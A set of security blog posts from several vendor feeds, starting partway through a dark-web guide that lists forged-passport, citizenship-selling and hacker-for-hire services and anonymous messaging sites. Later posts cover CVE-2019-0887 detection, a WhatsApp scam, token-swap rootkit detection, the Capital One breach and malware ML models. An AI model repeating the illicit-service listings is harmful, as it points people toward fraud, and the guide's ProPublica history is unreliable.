  • Gold & Diamonds – site offers ‘real’ diamonds and gold. (Un)fortunately, it only ships to Germany and the United States.
  • PirateSec – legit hackers, at your service!
  • Fake Passports – I think it’s self-explanatory.
  • SOL’s United States Citizenship – sells American citizenships; go figure.
  • Digital Gangster – the most gangsta way to hack someone’s computer. Apparently, these are Ronin hackers who can be hired for exploits, web hacking, password retrieval, and all-purpose espionage.
  • Onion Identity Services – summer discounts for IDs and passports. Bitcoins only.

Email clients

Always remember that the dark web is a people-centric community. So, it’s only natural to find ways to keep in touch with your darknet buddies and\or customers. There are several email and IM services which you can use, and it’s highly recommended to pick one if you want to step up your dark web game.

In terms of functionality, I don’t think there are too many differences between regular IMAP, POP3, and SMT services and the stuff you can use to communicate on the dark web. Let’s start with the email clients.

  • secMail – full-fledged email service. Pretty simplistic in design: you can compose, send, and receive emails. All the great things about an email client, minus the tracking, eavesdropping, and other privacy issues.
  • Lelantos- pay-to-use email service. Great security and privacy features, but it has one of the most unreliable and sidetrackable registration forms. Proceed at your own risk.
  • Bitmail.la – another pay-to-use email client. Has many features like IMAP, SMTP, and POP3 support, and a 500MB mailbox. Apparently, a lifetime membership costs $0.60.
  • Mail2Tor- a free email service which, reportedly, works on both dark and clear web.
  • Guerilla Mail – creates a disposable email address.
  • AnonInbox – pay-to-use email client. Supports IMAP, SMTP, and POP3; charges around 0.1 BTC per year.
  • Protonmail – has both paid and free subscriptions. Boasts the browser-encrypted email technology.

Chat\Social Media

Right. Let’s now talk about social media and instant messaging. Believe it or not, Zuckerberg’s Facebook has a darknet version. It’s mostly used for covert communication, anonymous tips submission, and stuff like that.

Sure, it’s not as secure as the clear web version, but it’s there and totally legal to use. Hidden Facebook is hardly the only social media client on the dark web. Check out the list below for the ‘hottest’ dark web clients.

  • BlackBook – works pretty much the same way as Facebook: you can chat, send pictures and friend requests, post status updates, and join groups. Though competing head-to-head with Facebook Onion, BlackBook’s prone to hacking. Reportedly, the client was disabled at least a couple of times in 2018.
  • Torbook – very similar to BlackBook. Some claim that both of them rose at around the same time, despite the creators not knowing each other.
  • The Campfire – gather around the campfire, folks to hear the tale of tales. The name’s rather suggestive – a big chatroom; everybody can join, and the topics can be anything from the latest trends in the music industry to how you can hide a human body.
  • Lucky Eddie’s Home – scripted chat room that sports one of the most efficient file-uploading system on the dark web. Just like any IM app, you can send or receive messages, join or create groups, and send files.
  • MadIRC Chat Server – if you’re over 30, you certainly remember the mIRC era. Surprisingly enough, IRC off-spins are still being used today, mostly for covert conversations or intranet communication. MadIRC Chat works just like a regular IRC – no or subscription required. Just pick a username and join in on the fun. I know sharing is caring, but in this case, I would advise you not to share any personal details because you may never know who’s on the other side of the line.
  • Chat with strangers – think Omegle, but on the dark web. Just fire up the client, connect to a chat room, and that’s it. You can’t send or receive files. Still, if you’re lucky, perhaps you can partake in a scintillating conversation.

Journalism and advocacy groups

As I’ve mentioned, the dark web isn’t just a place of eternal torment, teeming with drug dealers, human traffickers, and a hitman. It’s also used by journalists, advocacy group members, and political refugees in hiding. Reuters, Fox, NBC, CNN – all of them keep open dark web channels to receive anonymous tips from whistleblowers.

Advocacy groups are also reaping the advantages of the darknet because, here, the term of censorship is as popular as HTTPS. And finally, we have political outcasts, refugees, and people who want to get in touch with the outside world, being from a totalitarian country that suppresses all means of communication and information.

Of course, there are your run-of-the-mill congregations, which will worship anything from Lucifer to the flying spaghetti monster.

If you’re interested in subversive journalist, here are a couple of sites you can try visiting:

  • Soylent News – a trans spectrum darknet news aggregator. Features webmaster-moderated forums on which you can submit comments. You can also get involved by either submitting tips or writing news.
  • ProPublica – historically, ProPublica’s the first major news outlet to feature well, a darknet outlet. With an activity spanning almost four years, ProPublica managed to expose power abuses and blow the lid on covert activities conducted by governmental institutions. Although quite young compared to other darknet news outlets, ProPublica’s work was rewarded with five Pulitzer Prizes for Feature Writing, the last one being awarded to Hannah Dreier, the investigative journalist who covered the gangs of Los Angeles.

More on how to stay safe on the dark web

Already went through VPNs, anonymizing web browsers, and disposable operating systems, so I won’t bother reminding you about those. Here some other things you can try to bolster your security.

1. Minimize or rescale your Tor browsing window

Sounds rather off, doesn’t it? Well, there’s a reason why it’s recommended to browse with a minimized or rescaled window – you can be tracked based on your active window’s dimensions (yeah, they really can do that). So, do yourself a favor and rescale that Tor window as much as you can before proceeding.

2. Tweak the security settings

Tor has an in-build slider which lets you adjust the level of security. Just click on the onion icon and choose Security Settings. Adjust the slider until the cursor points to safest. This means that the JavaScript will be disabled by default on every website and some symbols and images will not be displayed.

3. Never use your credit and debit card for purchases

I’ll go farther than that and say stay away from darknet shops. Maybe some of them are legit, but are you really willing to take that chance? Still, if you’re really itching to purchase a new phone or God knows whatever, I would advise you to stick with Bitcoins or your favorite crypto coin. Using credit or debit cards for this sort of things is like painting a big bullseye on your bank account while yelling: “come here and take my money.”

4. Close Tails after finishing your session

When you’re done surfing or shopping on the dark web, don’t forget to shut down Tails. The major advantage of using a live OS such as Tails is that, on shut down, the OS wipes itself from the thumb drive you’ve installed it. That’s why it’s never a good idea to burn Tails on DVD.

5. Don’t stick your nose where it doesn’t belong

Great life advice, but it’s even more valuable where the darknet is concerned. Keep in mind that many criminal organizations are using the dark web to communicate or sell merchandise. Some of these channels are under watch. You may very well end up in the middle of a stakeout that could turn ugly. So, if the website looks fishy, close the tab, and forget about it.

Wrap-up

This is where I get off – been a long journey and I hope I’ve managed to at least change your perspective on the dark web. So, to wrap it up nice and tight, remember to take all the necessary precautions, refrain from using your debit or credit card, stay away from dubious groups, and have fun while you’re at it. As always, for comments, rants, ad-libs, or beer donations, shoot me a comment. Cheers!

The post How to Get on the Dark Web: A Step-by-Step Guide appeared first on Heimdal Security Blog.

How should enterprises fill the rising talent gap in cybersecurity?

Estimated reading time: 2 minutes

The cyber threat landscape is one of the most talked-about issues, across industries, currently. The dynamic nature of cyberattacks automatically transforms cybersecurity to be the complete opposite of a stable function. Cybercriminals and hackers are trying to find new ways to attack enterprise systems almost every single second. Trends change quickly – yesterday’s threats can become outdated the next day and what works as a cybersecurity measure today may well have no effect tomorrow.

No wonder then, that cybersecurity as a core enterprise function struggles with the talent gap. A Frost & Sullivan report observed that the global cybersecurity workforce will have more than 1.5 million vacancies by 2020. To fill this gap, enterprises need to be agile and think on their feet to procure cybersecurity talent.

If they don’t, it is more than likely that the consequences could be disastrous – faced with mounting cybersecurity threats of varied nature and dimensions, an enterprise could end up with unskilled personnel to deal with a real threat.

So how can enterprises find a sustainable solution to fill this gap?

Some pointers that enterprises can consider are –

Look beyond degrees

Cyberthreats and the knowledge to defend the enterprise against them are always outsmarting each other. The continuously changing nature of the cybersecurity threat landscape means that the knowledge on how to fight these threats is also ever-changing. That inherently means that this is not a skill or talent that can be really gauged by conventional degrees.

Hence, instead of conforming to norms and force-fitting cybersecurity graduates, enterprises must broaden their horizons. They must instead look beyond degrees and identify the inherent traits required to solve cybersecurity problems when they hire employees.

Look for a culture fit

To invest in good, reliable cybersecurity personnel, enterprises must identify certain cultural traits and aim for hiring along those lines. Candidates must be inquisitive with a knack for problem-solving and going into the depth of problems to understand them. They should be good at pressure handling and should always have a back-up plan. But, most importantly, they must have a bent of mind towards cybersecurity, understanding its significance, its importance and exhibiting cyber-secure behaviour in their own actions.

Invest in certifications

The best way to keep up with changing cybersecurity trends is to ensure personnel take certification courses which help them stay updated. Many organizations offer such certifications as a part of their Learning & Development calendar. To develop skill sets in the IT security domain for partner workforces, Seqrite also offers certification courses like Seqrite Certified Endpoint Security Professional and Seqrite Certified UM Professional, enabling professionals to demonstrate product features, configure security policies and deploy products in standard environments.

Develop and maintain strategic objectives

Ultimately, considering the criticality of cybersecurity for an enterprise, it is extremely important for it to begin at the board level of an organization. Enterprises must have clearly-defined strategies and policies on cybersecurity, outlining their protection mechanisms, what they are trying to achieve and how they execute plans.

This will ensure that enterprise cybersecurity has a roadmap and is not being dealt with in a casual manner, be it managing the talent gap or absorption of new cybersecurity talent. It is also important for enterprises to maintain cybersecurity programs within the organization and encourage upskilling.

By keeping the above pointers in mind, enterprises can sustain the growing cybersecurity challenge by opening a constant channel of highly upskilled cybersecurity professionals and cyber – secure the enterprise.

The post How should enterprises fill the rising talent gap in cybersecurity? appeared first on Seqrite Blog.

A case study in industry collaboration: Poisoned RDP vulnerability disclosure and response

Earlier this year, I reached out to Check Point researcher Eyal Itkin, who had published multiple flaws in several Remote Desktop Protocol (RDP) clients, including a vulnerability in mstsc.exe, the built-in RDP client application in Windows. While there were no active exploits detected in the wild, it was important for me and my team at Microsoft to analyze the vulnerability, do further variant analysis and investigations, and build defenses, including cloud-based post-breach detection in addition to the operating system fix.

The cross-company collaboration that followed was especially critical in this case, because the attack technique is quite tricky to detect. The vulnerability exists in the shared clipboard mechanism. Unlike other RDP vulnerabilities that could allow an attacker to connect to target machines using the RDP protocol, in this case, an attacker would wait for a user to connect to a compromised machine, and then start the attack through the vulnerability. RDP anomaly detection wouldn’t be useful, because exploit behavior doesn’t stand out as unusual.

The vulnerability, called Poisoned RDP vulnerability and designated as CVE-2019-0887, has been fixed, but it serves as a good case study for industry collaboration leading to better and speedier response to security issues. In this blog, we’ll share an overview of the vulnerability and how we worked with Check Point to build the defenses using Windows telemetry.

Path traversal vulnerability in shared clipboard

A typical RDP scenario is connecting an RDP client to an RDP server installed on a remote computer. After successfully connecting, the client gains access to the remote server. Depending on the user’s permissions, the client can then control the server. What happens if it’s the other way around, where a remote server can attack and gain control of a client?

In his research into reverse RDP attacks, Eyal Itkin found that for mstsc.exe, this technique, also referred to as lazy lateral movement, was possible through the clipboard sharing channel. The shared clipboard allows a user to copy a group of files from one computer and paste the said files in another computer. If the client fails to properly canonicalize and sanitize the file paths it receives, it could be vulnerable to a path traversal attack, allowing a malicious RDP server to drop arbitrary files in arbitrary paths on the client machine.

Figure 1. Architecture of clipboard sharing in Microsoft RDP (source: Reverse RDP Attack: Code Execution on RDP Clients)

Moreover, every time a clipboard is updated on either side of the RDP connection, a message is sent to the other side to notify it about the new clipboard formats that are now available. This means that a malicious server is notified whenever the client copies something to the clipboard, which the server can then query and read.

The server can also notify the client about a fake clipboard update without an actual copy operation inside the RDP window, thus completely controlling the client’s clipboard without the user being noticed.

Eyal also found that, because Hyper-V uses RDP, it inherits the security vulnerabilities in RDP. Hyper-V uses RDP behind the scenes for managing the VM, meaning that the vulnerability could be used to escape a Hyper-V VM, resulting in a guest-to-host sandbox escape vulnerability.

Cloud-based post-breach detection

While we worked on fixing the vulnerability, it was important for us to develop a post-breach detection in order to protect customers from attacks that might exploit the vulnerability. For this effort, we worked closely with Eyal, whose cooperation was critical to the development of these solutions.

Given the details of the vulnerability, we worked under the following conditions:

  • To be effective, the detections would need to use existing optics available to all Windows 10 versions.
  • The detection logic should spot the threat from the machine where the RDP client—the one that initiates the RDP connection—is installed. We should be able to detect files that are transformed from the compromised machine—where the RDP server is installed—to the client machine. This means that we must rely solely on telemetry that is triggered on the client machine.
  • RDP anomaly detection is not useful in this scenario. Since the RDP connection is initiated by the client machine—more specifically, by the user—we don’t expect an abnormal connection to occur.

For this purpose, Event Tracing for Windows (ETW), a built-in Windows 10 feature, provides the kernel-level tracing that’s useful in detecting this threat. Using ETW events, specifically RDP connection events (provider: Microsoft-Windows-RemoteDesktopServices-RdpCoreTS) and clipboard events (provider: Microsoft.Windows.OLE.Clipboard), as well as file creation events, we created a detection logic that:

  1. Observes RDP session events
  2. Observes multiple files being pasted within a short period of time
  3. Correlates file creation and pasting timestamps
  4. Raises an alert if the corelated files are in different directories

These detections are added to the Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) endpoint detection and response. These detections raise an alert in Microsoft Defender Security Center, which security operations personnel can then use to investigate attacks.

In addition, given that this is a new attack scenario, we explored additional detection logic that is as general as possible to help counter corner cases and account for tweaks to the attack scenario. These detections would cover the end-to-end attack, focusing on behaviors pertinent to the attack scenario:

  • Monitoring the Startup folder. This includes anomaly detection for file creation events under the Startup folder using multiple features like file signature, creation process, etc. In addition, files created in the Startup folder can be verified using scanning capabilities.
  • Identifying anomalous file pasting from the clipboard. Machine learning-based detections can recognize files that are pasted in different locations within a short period of time. The anomaly features can be the number of pasted files or file directories.
  • Detecting file creation anomalies. Machine-learning based detections can recognize anomalies in file creation paths. The anomaly features can be file path, creation time, and file name. Note: This detection covers a broad scenario, regardless of method.

Security update

Microsoft Security Response Center (MSRC) worked with Check Point to further investigate and address the vulnerability. The fix for CVE-2019-0887 was released as part of the July 2019 security update. We encourage customers to keep systems up-to-date.

Conclusion: Lessons from CVE-2019-0887

The responsible disclosure of CVE-2019-0887 by Check Point and the subsequent collaboration with Microsoft teaches us several lessons in security. From design perspective, there’s a lesson to be learned from how the clipboard, which was originally designed to be used locally, was applied in new environments.

Meanwhile, our research into post-breach defenses given the unique characteristics of this attack scenario highlighted the importance of Windows telemetry in detecting malicious behavior. ETW is a powerful defender tool that allows the creation of new detection mechanisms that don’t require an OS update.

Overall, this cross-company, cross-continent teamwork demonstrates the benefits of industry collaboration. We discovered a vulnerability, secured customers, and developed fix, all while learning important lessons that we can share with the industry.

Eyal and I shared these lessons in our Black Hat USA 2019 session, “He Said, She Said – Poisoned RDP Offense and Defense”.

 

Dana Baril (@dana_baril)

Microsoft Defender ATP Research Team 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

The post A case study in industry collaboration: Poisoned RDP vulnerability disclosure and response appeared first on Microsoft Security.

Enterprises can begin securing their endpoints by following these five simple steps.

Estimated reading time: 3 minutes

Sustainable enterprise security is both a great practice and a core business process. Enterprises are increasingly becoming aware of the diverse & intense nature of threats that exist in cybersphere and the damage it can cause – that’s where strong enterprise security solutions come in.

This is step one – enterprise security consists of ever-evolving complex layers that are never in stasis. Hence, after every cycle, security mechanisms only tend to get stronger. However, cyberattackers are getting extremely savvy and sophisticated in their malware onslaught, ensuring that attacks are timed to penetrate endpoints during cybersecurity transitional phases.

Hence, here are some easy-to-prevent flaws that can creep in when enterprises try to secure their endpoints.

  1. Lack of proper enterprise security policies

Enterprise security policies cannot be ad-hoc – this process needs to be implemented right from the beginning, and that is where strong enterprise security takes root. The best strategies can be ineffective if they are not backed up with strong security policies.

When it comes to enterprise security, organizations must be proactive in drafting policies. The crux of these security policies should consist of employee dos and don’ts, workforce collaboration that supports cybersecurity, human resource initiatives on malware literacy, among many others and should be complied to and regularly updated so that business security is never at risk.

  1. Inability to prioritize security integration of mobiles into enterprise networks

Mobile phones as work devices are seeing increasing adoption in the enterprise. Employees, that leverage this facility need to bind their devices with enterprise security ports so that business-critical data is not compromised. Due to rising attacks on mobile devices, Enterprise Mobility Management (EMM) has become a must for businesses of all sizes that allow this facility. Solutions like Seqrite mSuite are excellent solutions through which employees can safely access productivity apps on BYOD (Bring Your Own Device) or CYOD (Choose Your Own Device) platforms while maintaining strong security.

  1. Compliance with regulations

Most companies nowadays operate under some sort of regulatory control of their data, for example, HIPAA for private health information or the FERPA for student records. Often this information is stored in the cloud with the intention of keeping this ultra-sensitive data hidden from cybercriminals. As such, leaking of this information can have serious consequences – hence enterprises should be vigilant about being compliant about the nature of data and it’s storage.

  1. Faulty access permission

Enterprises can build the strongest firewalls at par with military standards, but the framework will collapse if appropriate access control mechanisms are not put in place.  Essentially, system administrators need to grant precise access to business users based on their role in the organization. This ensures that insider breaches do not happen and sensitive information remains confidential. Also, if hackers gain direct access to employee systems, they can break-in creating a demolition kind of scenario for any business.

  1. Not taking employees into confidence

Employees are the backbone for maintaining cybersecurity decorum. Hence, enterprises should consider taking employees into consideration and be confident about them as they look to implement cybersecurity solutions. They must be made aware of the dangers of weak enterprise security, the steps they can take and the warning signs they should look for. Since cyberthreats are highly dynamic and dangerous, if organizations don’t train employees properly, they are highly prone to be internal agents and channels of a guaranteed cyberattack.

After covering these flaws internally, enterprises should choose to invest in proven cybersecurity solutions such as Seqrite Endpoint Security (EPS) which offers a simple and comprehensive platform integrating several advanced technologies in one place for protection against advanced cyber threats.

EPS also comes packed with other vital features such as –

  • Web Filtering
  • Application Control
  • Vulnerability Scan
  • Patch Management
  • File Activity Monitor
  • IDS/IPS Protection

The post Enterprises can begin securing their endpoints by following these five simple steps. appeared first on Seqrite Blog.

Be Wary of WhatsApp Messages Offering 1000GB of Free Data

Global messaging giant WhatsApp turned 10 years old this year. It’s not unusual for companies to provide loyal customers or members with gifts to show their appreciation during these milestones. Unfortunately, cybercriminals are using this as a ploy to carry out their malicious schemes. According to Forbes, security researchers have discovered a fraudulent message promising users 1000GB of free internet data, which is a scam bringing in ad click revenue for cybercriminals.

Let’s dive into the details of this suspicious message. The text reads “WhatsApp Offers 1000GB Free Internet!” and includes a link to click on for more details. However, the link provided doesn’t use an official WhatsApp domain. Many users might find this confusing since some businesses do run their promotions through third-party organizations. Forbes states that once a user clicks on the link, they are taken to a landing page that reads “We offer you 1000 GB free internet without Wi-Fi! On the occasion of our 10th anniversary of WhatsApp.” To make the user feel like they need to act fast, the landing page also displays a bright yellow countdown sticker warning that there are a limited number of awards left.

As of now, it doesn’t appear that the link spreads malware or scrapes users’ personal information. However, the scam could eventually evolve into a phishing tactic. Additionally, the more users click on the fraudulent link, the more the cybercriminals behind this scheme rack up bogus ad clicks. This ultimately brings in revenue for the cybercrooks, encouraging them to continue creating these types of scams. For example, the domain being used by the scammers behind the WhatsApp message also hosts other fake brand-led promotional offers for Adidas, Nestle, Rolex, and more.

So, what can users do to prevent falling for these phony ads? Check out the following tips to help you stay secure:

  • Avoid interacting with suspicious messages. Err on the side of caution and don’t respond to direct messages from a company that seems out of the ordinary. If you want to know if a company is participating in a promotional offer, it is best to go directly to their official site to get more information.
  • Be careful what you click on.If you receive a message in an unfamiliar language, one that contains typos, or one that makes claims that seem too good to be true, avoid clicking on any attached links.
  • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help safeguard you from malware and warn you of phishing attempts so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Be Wary of WhatsApp Messages Offering 1000GB of Free Data appeared first on McAfee Blogs.

How Windows Defender Antivirus integrates hardware-based system integrity for informed, extensive endpoint protection

Detecting and stopping attacks that tamper with kernel-mode agents at the hypervisor level is a critical component of the unified endpoint protection platform in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP). It’s not without challenges, but the deep integration of Windows Defender Antivirus with hardware-based isolation capabilities allows the detection of artifacts of such attacks.

Recently, the Microsoft Defender ATP research team found a malicious system driver enabling a token swap attack that could lead to privilege escalation. In this blog, we’ll share our analysis of the said attack and discuss how Windows Defender Antivirus uses its unique visibility into system behaviors to detect dangerous kernel threats.

Hardware-based root of trust

Windows Defender System Guard, a hardware-based system integrity capability in Microsoft Defender ATP, has a runtime measurement component called runtime attestation. This runtime measurement component includes a sub-engine called assertion engine (see Figure 1), which continuously measures and asserts the integrity of the Windows kernel, providing supplementary signals about any abnormal system behavior.

Figure 1. High-level Windows Defender System Guard runtime attestation architecture

Architecturally, the solution is collectively referred to as the Windows Defender System Guard runtime monitor and consists of the following client-side components:

  • The VTL-1 runtime assertion engine itself
  • A VTL-0 kernel-mode agent
  • A VTL-0 process we call the ‘broker’ to host the assertion engine

The goal is to detect artifacts of data corruption attacks and other threats that tamper with kernel-mode agents at the hypervisor level. Windows Defender Antivirus, the next-generation component of Microsoft Defender ATP, integrates with Windows Defender System Guard runtime attestation and consumes signals from the assertion engine.

Detecting token theft attacks

Every Windows process has a primary token that describes the security context of the user account associated with the process. The information in the token includes the identity and privileges of the user account associated with the process or thread. Token theft attacks are rampant because they can allow adversaries to use access tokens to operate using different user accounts or under different system security contexts to perform malicious actions and evade detection.

The Microsoft Defender ATP Research team recently uncovered and analyzed signals from Windows Defender System Guard assertion engine that indicated manipulation of a primary token, causing token swap – a distinctly suspicious activity, given that the aspects of a primary token are immutable once the process starts running.

Further analysis of Windows Defender Antivirus telemetry identified the offending malicious system driver responsible for the invariant token swap attack. The sample containing the system driver was signed with a compromised certificate (thumbprint: 31e5380e1e0e1dd841f0c1741b38556b252e6231) that’s commonly misused in the wild.

Figure 2. Revoked certificate used by malicious system driver

The driver exhibited the following rootkit behavior:

  • Token swap
  • Tampering EPROCESS structure in kernel mode and PEB to disguise a process as svchost.exe

In this scenario, Windows Defender System Guard raised an initial assertion failure signal for the token swap. Windows Defender Antivirus consumed the signal and applied intelligence to discover that the suspicious activity was being orchestrated by a system driver.

Figure 3. Decompiled malicious driver code for token theft

Using a Microsoft cloud service that that keeps track of stolen or revoked PKI certificates worldwide, Windows Defender Antivirus found that the driver was indeed signed by a revoked or stolen certificate, which was communicating with the infected binary to perform the token swap.

Windows Defender Antivirus works seamlessly with Microsoft cloud services, such as the one that flags binaries signed by stolen or revoked certificates. Signals like these enrich the protection delivered by multiple next-generation protection engines in Windows Defender Antivirus to provide near-instant, automated defense against new and emerging threats. With cloud-delivered protection, next-generation technologies provide rapid identification and blocking of attacks, typically even before a single machine is infected.

Device integrity for broader security

The goal of Windows System Guard runtime attestation is to provide its consumers with a trustworthy assessment of the security posture and integrity of devices. Apps and services can take advantage of this attestation technology to ensure that the system is free from tampering and that critical processes are running as expected. Runtime attestation can help in many scenarios, including:

  • Providing supplementary signals for endpoint detection and response (EDR) and antivirus vendors (including full integration with the Microsoft Defender ATP stack)
  • Detecting artifacts of kernel tampering, rootkits, and exploits
  • Protected game anti-cheat scenarios (for example, detection of process-protection bypasses that can lead to game-state modification)
  • Securing sensitive transactions (banking apps, trading platforms)
  • Conditional access (enabling and enhancing device security-based access policies)

The assertion engine can detect attacks that can reasonably be performed under the most restrictive attack conditions, such as when system has been already hardened with hypervisor-protected code integrity (HVCI) and enforced kernel mode code integrity (KMCI).

The case study has shown how Microsoft Defender ATP – hence, the broader Microsoft Threat Protection – reaps significant security benefits from Windows Defender System Guard runtime attestation. We invite the industry to do the same.

To learn more, read our blog about Windows Defender System Guard runtime attestation.

 

 

Abhijat Singh, Enterprise & Security
David Kaplan (@depletionmode), Microsoft Defender ATP Research
Chun Feng, Microsoft Defender ATP Research
Hermineh Sanossian, Enterprise & Security

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

The post How Windows Defender Antivirus integrates hardware-based system integrity for informed, extensive endpoint protection appeared first on Microsoft Security.

Capital One Data Breach: How Impacted Users Can Stay More Secure

Capital One is one of the 10 largest banks based on U.S. deposits. As with many big-name brands, cybercriminals see these companies as an ideal target to carry out large-scale attacks, which has now become a reality for the financial organization. According to CNN, approximately 100 million Capital One users in the U.S. and 6 million in Canada have been affected by a data breach exposing about 140,000 Social Security numbers, 1 million Canadian Social Insurance numbers, and 80,000 bank account numbers, and more.

According to the New York Post, the alleged hacker claimed the data was obtained through a firewall misconfiguration. This misconfiguration allowed command execution with a server that granted access to data in Capital One’s storage space at Amazon. Luckily, Capital One stated that it “immediately fixed the configuration vulnerability.”

This breach serves as a reminder that users and companies alike should do everything in their power to keep personal information protected. If you think you might have been affected by this breach, follow these tips to help you stay secure:

  • Check to see if you’ve been notified by Capital One. The bank will notify everyone who was affected by the breach and offer them free credit monitoring and identity protection services. Be sure to take advantage of the services and check out the website Capital One set up for information on this breach.
  • Review your accounts. Be sure to look over your credit card and banking statements and report any suspicious activity as soon as possible. Capital One will allow you to freeze your card so purchases can no longer be made.
  • Change your credentials. Err on the side of caution and change your passwords for all of your accounts. Taking extra precautions can help you avoid future attacks.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Capital One Data Breach: How Impacted Users Can Stay More Secure appeared first on McAfee Blogs.

What are some of the worst enterprise security habits?

Estimated reading time: 3 minutes

Enterprise security is a habit! Good habits take years to form – bad habits, on the other hand, take only seconds, and can bring years of hard work taken down in minutes. The same rule applies to enterprise security also.

It’s just easier to put an easy password (or worse, no password) on an important function and leave it open to danger – or turn off the auto-updater of your security solution, consequently leading to disaster and danger.

Hence, here are ten of the worst enterprise security habits which organizations should get rid off immediately –

  1. Access to everything – Strangely, a lot of organizations, especially the legacy ones allow everyone, access to everything. The net result of this critical oversight transforms enterprise security to be seriously low ensuring that the organization is just one small slip up away from a major disaster.
  2. No security policy – Most companies have policies for everything – HR policies, leave policies, dress policies, time policies, so it’s amusing that they don’t have something as intrinsic as a cyber security policy. Enterprises must keep a strong, updated cyber security policy with clear dos-and-don’ts about what measures need to be taken.
  3. Software update – The grim realization when the WannaCry ransomware attack hit the world and caused mayhem was that it could have easily been avoided. It exploited a security hole in Windows XP. Yes, that’s right – Windows XP, an operating system which is now almost two decades old and which Microsoft itself stopped supporting in 2014. In fact, it was found that 7% of PCs all across the world still use this outdated operating system. This example sums up the extreme danger of not updating the software a business uses.
  4. Underestimating social engineering – Many enterprises can slip into the notion that cyber security is purely a technological problem and putting in place, a strong cyber security solution can solve all problems. But that is not the case – social engineering is as big an issue as cyber security, nowadays. The only way to solve this is to ensure that employees are as well- versed in cyber security issues as experts.
  5. Forgetting to patch software – It’s fine to keep a strong cyber security focus but enterprises can call on great harm if they don’t patch their software. Even the most secure software can become outdated extremely fast and may be at risk of attack. Enterprises must be proactive in patching software at regular, timely intervals.
  6. Believing we won’t be attacked – SMBs and SOHOs usually perceive that they won’t be prone to cyber-attacks as hackers will be typically interested in attacking larger corporations. But the truth is, smaller enterprises are at high risk of attacks as cyber criminals know about smaller businesses having weaker defenses, compared to relatively high-profile organizations.
  7. Not having a security response plan – This ties into the above point but is applicable for organizations at all scales. Complacency can often creep into enterprises which means that they believe that they are immune to cyber-attacks. This means they won’t even have a security response plan which can be catastrophic at the worst possible time – when an attack hits.
  8. Not having cyber security drills – It’s okay to have a security response plan but is it updated? Has it practically ever been used? Mock drills can help showcase an enterprise’s preparedness to cyber-attacks, while lack of these drills means that there might be chaos.
  9. Not investing in the right people – Cyber security hiring is increasingly becoming a specialized trend now, one which enterprises must wake up to. It’s important to have good skilled personnel to deal with the cyber security function and ensure that they keep on getting new certifications so they stay updated.
  10. No backup – Backup is integral in cyber security. Enterprises sometimes neglect backup which puts them in a precarious situation, whenever there is a cyber security attack. Don’t wait for that time – invest in good backup solutions and ensure that valuable data is backed up to prevent loss.

By getting rid of the above enterprise security habits and investing in a strong, secure cyber security solution (like Seqrite’s range of solutions), enterprises can go a long way in ensuring that their network security parameters are safe and secure.

The post What are some of the worst enterprise security habits? appeared first on Seqrite Blog.

New machine learning model sifts through the good to unearth the bad in evasive malware

We continuously harden machine learning protections against evasion and adversarial attacks. One of the latest innovations in our protection technology is the addition of a class of hardened malware detection machine learning models called monotonic models to Microsoft Defender ATP‘s Antivirus.

Historically, detection evasion has followed a common pattern: attackers would build new versions of their malware and test them offline against antivirus solutions. They’d keep making adjustments until the malware can evade antivirus products. Attackers then carry out their campaign knowing that the malware won’t initially be blocked by AV solutions, which are then forced to catch up by adding detections for the malware. In the cybercriminal underground, antivirus evasion services are available to make this process easier for attackers.

Microsoft Defender ATP’s Antivirus has significantly advanced in becoming resistant to attacker tactics like this. A sizeable portion of the protection we deliver are powered by machine learning models hosted in the cloud. The cloud protection service breaks attackers’ ability to test and adapt to our defenses in an offline environment, because attackers must either forgo testing, or test against our defenses in the cloud, where we can observe them and react even before they begin.

Hardening our defenses against adversarial attacks doesn’t end there. In this blog we’ll discuss a new class of cloud-based ML models that further harden our protections against detection evasion.

Most machine learning models are trained on a mix of malicious and clean features. Attackers routinely try to throw these models off balance by stuffing clean features into malware.

Monotonic models are resistant against adversarial attacks because they are trained differently: they only look for malicious features. The magic is this: Attackers can’t evade a monotonic model by adding clean features. To evade a monotonic model, an attacker would have to remove malicious features.

Monotonic models explained

Last summer, researchers from UC Berkeley (Incer, Inigo, et al, “Adversarially robust malware detection using monotonic classification”, Proceedings of the Fourth ACM International Workshop on Security and Privacy Analytics, ACM, 2018) proposed applying a technique of adding monotonic constraints to malware detection machine learning models to make models robust against adversaries. Simply put, the said technique only allows the machine learning model to leverage malicious features when considering a file – it’s not allowed to use any clean features.

Figure 1. Features used by a baseline versus a monotonic constrained logistic regression classifier. The monotonic classifier does not use cleanly-weighted features so that it’s more robust to adversaries.

Inspired by the academic research, we deployed our first monotonic logistic regression models to Microsoft Defender ATP cloud protection service in late 2018. Since then, they’ve played an important part in protecting against attacks.

Figure 2 below illustrates the production performance of the monotonic classifiers versus the baseline unconstrained model. Monotonic-constrained models expectedly have lower outcome in detecting malware overall compared to classic models. However, they can detect malware attacks that otherwise would have been missed because of clean features.

Figure 2. Malware detection machine learning classifiers comparing the unconstrained baseline classifier versus the monotonic constrained classifier in customer protection.

The monotonic classifiers don’t replace baseline classifiers; they run in addition to the baseline and add additional protection. We combine all our classifiers using stacked classifier ensembles–monotonic classifiers add significant value because of the unique classification they provide.

How Microsoft Defender ATP uses monotonic models to stop adversarial attacks

One common way for attackers to add clean features to malware is to digitally code-sign malware with trusted certificates. Malware families like ShadowHammer, Kovter, and Balamid are known to abuse certificates to evade detection. In many of these cases, the attackers impersonate legitimate registered businesses to defraud certificate authorities into issuing them trusted code-signing certificates.

